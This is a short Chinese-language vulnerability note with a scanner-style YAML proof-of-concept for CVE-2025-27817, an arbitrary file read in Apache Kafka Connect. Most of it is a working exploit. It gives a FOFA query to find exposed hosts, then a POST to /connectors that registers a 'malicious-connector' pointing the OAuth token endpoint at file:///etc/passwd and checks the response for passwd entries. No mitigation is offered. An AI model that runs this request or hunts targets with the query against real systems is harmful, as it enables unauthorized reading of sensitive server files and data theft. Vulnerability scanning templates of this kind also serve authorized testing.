漏洞描述
允许未经身份验证的攻击者利用该漏洞实现任意文件读取,大多数据处理中间件或流式处理框架,如:Apache Spark Structured Streaming、Apache Druid等在应用中需要调用Kafka Connect组件,而这些服务会存储大量的核心业务系统敏感数据,一旦被攻击将造成更加严重的数据泄密。
fofa:header="Jetty" && body="kafka_cluster_id"
CVE-2025-27817: Apache Kafka 客户端任意文件读取
PoC代码[已公开]
id: CVE-2025-27817
info:
name: Apache Kafka 客户端任意文件读取
author: avic123
severity: high
verified: true
description: |
允许未经身份验证的攻击者利用该漏洞实现任意文件读取,大多数据处理中间件或流式处理框架,如:Apache Spark Structured Streaming、Apache Druid等在应用中需要调用Kafka Connect组件,而这些服务会存储大量的核心业务系统敏感数据,一旦被攻击将造成更加严重的数据泄密。
fofa:header="Jetty" && body="kafka_cluster_id"
reference:
- https://mp.weixin.qq.com/s/z7Ppzv1k8flAXZiLQo9SSw
created: 2025/06/13
rules:
r0:
request:
method: POST
path: /connectors
headers:
Content-Type: /application/json
body: |
{
"name": "malicious-connector",
"config": {
"connector.class": "org.apache.kafka.connect.mirror.MirrorHeartbeatConnector",
"tasks.max": "1",
"source.cluster.alias": "source-0",
"target.cluster.alias": "target-0",
"source.cluster.bootstrap.servers": "127.0.0.1:9092",
"target.cluster.bootstrap.servers": "127.0.0.1:9092",
"producer.override.sasl.oauthbearer.token.endpoint.url": "file:///etc/passwd",
"producer.override.sasl.login.callback.handler.class": "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginCallbackHandler",
"producer.override.sasl.jaas.config": "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required serviceName=\"exploit\";",
"producer.override.sasl.mechanism": "OAUTHBEARER",
"value.converter": "org.apache.kafka.connect.converters.ByteArrayConverter",
"key.converter": "org.apache.kafka.connect.converters.ByteArrayConverter"
}
}
expression: >-
response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()